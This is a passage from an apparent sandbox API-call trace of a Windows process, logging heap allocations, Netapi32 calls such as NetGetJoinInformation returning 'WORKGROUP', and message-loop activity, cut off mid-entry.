0xe53370 [0248.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0248.485] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x16) returned 0xd01010 [0248.485] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0xd01010, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetGetJoinInformation", lpUsedDefaultChar=0x0) returned 22 [0248.485] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a48 | out: hHeap=0xbe0000) returned 1 [0248.485] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d620 [0248.485] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xd01010 | out: hHeap=0xbe0000) returned 1 [0248.485] GetProcAddress (hModule=0x744a0000, lpProcName="NetGetJoinInformation") returned 0x74462c3f [0248.486] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d620 | out: hHeap=0xbe0000) returned 1 [0248.486] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53370 | out: hHeap=0xbe0000) returned 1 [0248.486] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d620 [0248.486] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53370 [0248.486] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533b0 [0248.486] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53360 [0248.486] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20002) returned 0xe82c00 [0248.486] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53370 | out: hHeap=0xbe0000) returned 1 [0248.486] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533b0 | out: hHeap=0xbe0000) returned 1 [0248.486] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53360 | out: hHeap=0xbe0000) returned 1 [0248.486] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d620 | out: hHeap=0xbe0000) returned 1 [0248.486] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x8be950, BufferType=0x8be968 | out: lpNameBuffer=0x8be950*="WORKGROUP", BufferType=0x8be968) returned 0x0 [0248.488] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533b0 [0248.488] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe61b90 [0248.488] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a18 [0248.488] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf64c8 [0248.488] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf89d0 [0248.488] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf89e8 [0248.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53350 [0248.489] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89e8 | out: hHeap=0xbe0000) returned 1 [0248.489] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53350 | out: hHeap=0xbe0000) returned 1 [0248.489] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89d0 | out: hHeap=0xbe0000) returned 1 [0248.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf89d0 [0248.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf89e8 [0248.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6498 [0248.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53350 [0248.489] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe82c00 | out: hHeap=0xbe0000) returned 1 [0248.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf89a0 [0248.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf89b8 [0248.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6468 [0248.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53340 [0248.489] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6468 | out: hHeap=0xbe0000) returned 1 [0248.489] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.489] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf89b8 | out: hHeap=0xbe0000) returned 1 [0248.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf89b8 [0248.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6468 [0248.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8970 [0248.489] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53340 [0248.489] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8970 | out: hHeap=0xbe0000) returned 1 [0248.489] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.490] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6468 | out: hHeap=0xbe0000) returned 1 [0248.490] FreeLibrary (hLibModule=0x744a0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533a0 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53390 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53380 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5d0 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b50 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6738 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c70 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c58 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c40 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c10 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6708 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66d8 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8c28 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8be0 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bb0 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf66a8 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6678 | out: hHeap=0xbe0000) returned 1 [0248.493] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bc8 | out: hHeap=0xbe0000) returned 1 [0248.494] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b98 | out: hHeap=0xbe0000) returned 1 [0248.494] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b80 | out: hHeap=0xbe0000) returned 1 [0248.494] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6648 | out: hHeap=0xbe0000) returned 1 [0248.494] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe016a0 | out: hHeap=0xbe0000) returned 1 [0248.494] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52770 | out: hHeap=0xbe0000) returned 1 [0248.494] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 1 [0248.494] TranslateMessage (lpMsg=0x8befb4) returned 0 [0248.494] DispatchMessageW (lpMsg=0x8befb4) returned 0xffffffff [0248.494] GetForegroundWindow () returned 0x10058 [0248.494] GetWindowLongW (hWnd=0x10058, nIndex=-21) returned 0 [0248.494] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.494] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52770 [0248.494] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xe67c70 [0248.494] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52720 [0248.494] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe67c70 | out: hHeap=0xbe0000) returned 1 [0248.494] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.494] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52770 | out: hHeap=0xbe0000) returned 1 [0248.494] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.494] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5d0 [0248.494] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6648 [0248.494] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52770 [0248.494] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6648 | out: hHeap=0xbe0000) returned 1 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d760 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6648 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b80 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52720 [0248.495] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b80 | out: hHeap=0xbe0000) returned 1 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53380 [0248.495] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53380 | out: hHeap=0xbe0000) returned 1 [0248.495] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.495] PeekMessageW (in: lpMsg=0x8befb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8befb4) returned 0 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d788 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b80 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52720 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b98 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bc8 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53380 [0248.495] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bc8 | out: hHeap=0xbe0000) returned 1 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d7b0 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bc8 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53390 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6678 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe533a0 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40af0 [0248.495] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53340 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d7d8 [0248.496] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0248.496] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d7d8 | out: hHeap=0xbe0000) returned 1 [0248.496] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53340 | out: hHeap=0xbe0000) returned 1 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d7d8 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1) returned 0xe53340 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d800 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66a8 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53330 [0248.496] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53330 | out: hHeap=0xbe0000) returned 1 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf8bb0 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d828 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8be0 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53330 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe016a0 [0248.496] PeekMessageW (in: lpMsg=0x8be964, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8be964) returned 0 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d850 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c28 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53320 [0248.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66d8 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6708 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53310 [0248.497] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6708 | out: hHeap=0xbe0000) returned 1 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d878 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6708 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c10 [0248.497] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c40 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c58 [0248.497] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8c70 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6738 [0248.497] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b50 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a48 [0248.497] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8ad8 [0248.497] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.498] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6588 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a90 [0248.498] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8aa8 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.498] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53300 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b68 [0248.498] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6618 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532f0 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532e0 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b20 [0248.498] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6618 | out: hHeap=0xbe0000) returned 1 [0248.498] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532f0 | out: hHeap=0xbe0000) returned 1 [0248.498] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b20 | out: hHeap=0xbe0000) returned 1 [0248.498] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532e0 | out: hHeap=0xbe0000) returned 1 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8a0 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532e0 [0248.498] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b20 [0248.499] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532f0 [0248.499] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532d0 [0248.499] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6618 [0248.499] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b20 | out: hHeap=0xbe0000) returned 1 [0248.499] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532f0 | out: hHeap=0xbe0000) returned 1 [0248.499] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6618 | out: hHeap=0xbe0000) returned 1 [0248.499] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532d0 | out: hHeap=0xbe0000) returned 1 [0248.499] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532d0 [0248.499] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6618 [0248.499] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532f0 [0248.499] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532c0 [0248.499] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b20 [0248.499] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6618 | out: hHeap=0xbe0000) returned 1 [0248.499] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532f0 | out: hHeap=0xbe0000) returned 1 [0248.499] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b20 | out: hHeap=0xbe0000) returned 1 [0248.499] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532c0 | out: hHeap=0xbe0000) returned 1 [0248.499] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x74480000 [0248.510] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8958 [0248.510] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532c0 [0248.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0248.510] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x11) returned 0xe40b10 [0248.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0xe40b10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetApiBufferSize", lpUsedDefaultChar=0x0) returned 17 [0248.510] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8958 | out: hHeap=0xbe0000) returned 1 [0248.510] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8c8 [0248.510] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe40b10 | out: hHeap=0xbe0000) returned 1 [0248.510] GetProcAddress (hModule=0x74480000, lpProcName="NetApiBufferSize") returned 0x744b3789 [0248.510] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8c8 | out: hHeap=0xbe0000) returned 1 [0248.510] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532c0 | out: hHeap=0xbe0000) returned 1 [0248.510] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d8c8 [0248.510] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532c0 [0248.510] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532f0 [0248.511] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532c0 | out: hHeap=0xbe0000) returned 1 [0248.511] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532f0 | out: hHeap=0xbe0000) returned 1 [0248.511] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d8c8 | out: hHeap=0xbe0000) returned 1 [0248.511] NetApiBufferSize (in: Buffer=0xe08b68, ByteCount=0x8be300 | out: ByteCount=0x8be300) returned 0x0 [0248.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532f0 [0248.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x214) returned 0xe67c70 [0248.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf6408 [0248.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8910 [0248.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf63d8 [0248.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532c0 [0248.511] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf63d8 | out: hHeap=0xbe0000) returned 1 [0248.511] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532c0 | out: hHeap=0xbe0000) returned 1 [0248.511] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf63d8 [0248.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf88e0 [0248.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532c0 [0248.511] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf88e0 | out: hHeap=0xbe0000) returned 1 [0248.511] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532c0 | out: hHeap=0xbe0000) returned 1 [0248.511] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf63d8 | out: hHeap=0xbe0000) returned 1 [0248.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf63d8 [0248.512] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf88e0 [0248.512] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf88f8 [0248.512] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe532c0 [0248.512] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf88f8 | out: hHeap=0xbe0000) returned 1 [0248.512] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe532c0 | out: hHeap=0xbe0000) returned 1 [0248.512] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf88e0 | out: 